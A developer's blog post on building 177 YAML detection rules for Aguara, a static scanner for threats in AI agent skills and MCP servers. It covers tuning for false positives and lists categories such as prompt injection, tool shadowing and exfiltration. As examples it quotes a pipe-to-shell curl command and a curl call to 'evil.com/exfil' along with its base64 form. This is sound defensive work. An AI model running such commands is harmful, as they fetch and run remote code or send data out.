DEV Community

Gus
Gus

Posted on

I Wrote 177 Security Detection Rules for AI Agent Threats. Here's What I Learned.

Writing one detection rule is easy. Maintaining 177 that run against 50,000 files daily without drowning in false positives is a different problem.

Aguara is a static security scanner for AI agent skills and MCP servers. Every rule ships in YAML, has self-testing examples, and gets validated against a production dataset of 50,000+ real skills. Here's what building a rule engine at this scale taught me.

The anatomy of a rule

Every rule looks like this:

id: SUPPLY_006
name: "Unpinned npx execution"
severity: HIGH
category: supply-chain
targets: ["*.json", "*.yaml", "*.yml", "*.md"]
match_mode: any
remediation: "Pin the package to a specific version: npx @package@1.2.3"
patterns:
  - type: regex
    value: "npx\\s+-y\\s+@[\\w-]+/[\\w-]+"
  - type: regex
    value: "npx\\s+-y\\s+[\\w-]+"
exclude_patterns:
  - type: contains
    value: "@"
examples:
  true_positive:
    - "npx -y @someone/mcp-server"
    - "npx -y create-cool-app"
  false_positive:
    - "npx @someone/mcp-server@1.2.3"
Enter fullscreen mode Exit fullscreen mode

Fields: an ID, severity, file targets, one or more patterns, optional exclusions, and examples for both true and false positives. The examples aren't documentation. They're tests. make test compiles every rule and validates that true positives match and false positives don't.

Lesson 1: Go's regexp doesn't do lookaheads

This was my first surprise. Go's regexp package uses RE2, which doesn't support Perl-style lookaheads ((?!...)) or lookbehinds ((?<=...)).

I needed a rule to distinguish ln (hardlink, dangerous) from ln -s (symlink, less dangerous). In Perl regex: ln\s+(?!-s). In Go: not possible.

The workaround is the exclude_patterns field. Instead of a single complex regex, you write a matching pattern and a suppression pattern:

patterns:
  - type: regex
    value: "\\bln\\s+"
exclude_patterns:
  - type: regex
    value: "\\bln\\s+-s"
Enter fullscreen mode Exit fullscreen mode

The engine checks: did the pattern match? Yes. Does an exclude pattern also match on the same line or within 3 lines of context? If so, suppress.

This turns out to be more readable than nested lookaheads anyway. And it composes better. You can add exclude patterns without rewriting the primary regex.

Lesson 2: Markdown code blocks are not attacks

A skill file README with an installation section might include something like curl https://example.com/setup.sh | bash inside a fenced code block. That's documentation, not an attack. But the pattern for detecting piped shell execution matches it all the same.

The fix: code block awareness. Before running any rules, the engine builds a code block map in a single O(n) pass over the file. It walks every line, tracks whether it's inside a fenced block, and stores the result. Every finding located inside a fenced code block gets its severity downgraded by one tier (CRITICAL becomes HIGH, HIGH becomes MEDIUM).

The finding is preserved. A code example showing curl | bash is still worth noting. But it doesn't scream CRITICAL when it's clearly instructional.

This single feature eliminated ~30% of false positives in the first round of FP reduction.

Lesson 3: match_mode: all catches what single patterns miss

Some threats only exist as combinations. Reading environment variables isn't dangerous. POSTing to an external URL isn't dangerous. Both in the same file is data exfiltration.

match_mode: all requires every pattern in the rule to match somewhere in the file:

id: EXFIL_COMBO_001
match_mode: all
patterns:
  - type: regex
    value: "(?i)(env|environment|secret|credential|api.?key)"
  - type: regex
    value: "(?i)(https?://|webhook|POST|fetch|request)"
Enter fullscreen mode Exit fullscreen mode

This gives you cross-pattern detection without building a full taint analysis engine. (Aguara also has a real taint tracker as a separate layer, but the all mode catches many cases at the rule level.)

Lesson 4: Base64 hides everything

Attackers encode payloads. A base64-encoded curl http://evil.com/exfil looks like Y3VybCBodHRwOi8vZXZpbC5jb20vZXhmaWw=. No pattern matcher will catch that on the surface.

The decoder extracts every base64 and hex blob from the file, filters for printable content (>70% printable characters), and re-scans the decoded text against all rules. One extra pass, catches an entire class of evasion.

In production, we found base64-encoded reverse shells inside tool definitions in public registries. Not in the README. Inside the tool schema itself.

Lesson 5: Self-testing is not optional

Every rule has examples.true_positive and examples.false_positive. The test suite compiles each rule and validates:

  1. Every true positive matches (respecting match_mode)
  2. Every false positive does NOT match

This runs on every commit. When I change a regex to reduce false positives, the test immediately tells me if I broke a true positive. When I broaden a pattern, the false positive examples catch over-matching.

At 177 rules with 3-5 examples each, that's ~700 micro-tests running in seconds. They've caught more regressions than any other test in the codebase.

Lesson 6: Real data kills your precision assumptions

Rules that look good against curated examples fall apart against 50,000 real files. Things I didn't anticipate:

  • npm install instructions matching supply chain rules (every README has npm install)
  • Template variables like ${API_KEY} matching credential leak rules
  • Shell PATH modifications in setup scripts matching command execution rules
  • License URLs matching external download rules

Four rounds of FP reduction against the Aguara Watch production dataset:

  1. Code block severity downgrade (-30% FP)
  2. Context-aware exclusions - install commands under "Installation" headings suppressed (-15% FP)
  3. Template variable detection - ${VAR} and <PLACEHOLDER> patterns excluded from credential rules (-10% FP)
  4. Category-specific tuning - tightened regex for high-FP categories like supply chain

Current precision: ~82%. Not perfect. Every week the production data shows us new false positive patterns, and we write exclusions for them.

Lesson 7: 4096 characters is enough regex for anyone

We enforce a maximum pattern length of 4096 characters at compile time. I hit it once, trying to write a single regex that covered 15 variations of a credential pattern.

The fix: split it into multiple patterns under match_mode: any. Shorter patterns are easier to read, easier to debug, and compile faster.

If your regex is approaching 4096 characters, your regex is wrong. Break it up.

The rule categories

177 rules across 12 YAML files:

Category Rules What it catches
credential-leak 22 Hardcoded secrets, API keys, tokens, passwords
supply-chain 21 Unpinned packages, post-install scripts, dependency confusion
prompt-injection 18 Instruction overrides, hidden directives, authority claims
mcp-attack 16 Tool shadowing, description manipulation, scope escalation
external-download 16 Piped shell execution, wget, unpinned downloads
exfiltration 16 Data sending patterns, webhook usage, DNS tunneling
command-execution 15 Shell injection, eval, subprocess abuse
ssrf-cloud 11 Cloud metadata access, internal network scanning
mcp-config 11 Privileged containers, exposed env vars, broad permissions
indirect-injection 11 Cross-context injection, data-as-instructions
unicode-attack 10 Homoglyph attacks, bidirectional text manipulation
third-party-content 10 Iframe injection, remote script loading

On top of these, three additional analysis layers (structural NLP, taint tracking, and rug-pull detection) generate findings from code analysis rather than YAML-defined patterns.

Every rule includes remediation text. When something gets flagged, the scanner tells you what to do about it.

Contributing rules

The YAML format is designed to be readable by non-Go-developers. If you can write a regex and explain what it catches, you can contribute a rule:

  1. Pick a category YAML file in internal/rules/builtin/
  2. Add your rule with ID, patterns, and examples
  3. Run make test to validate
  4. Open a PR

The self-testing examples are your proof that the rule works. No Go code required.

github.com/garagon/aguara

Top comments (0)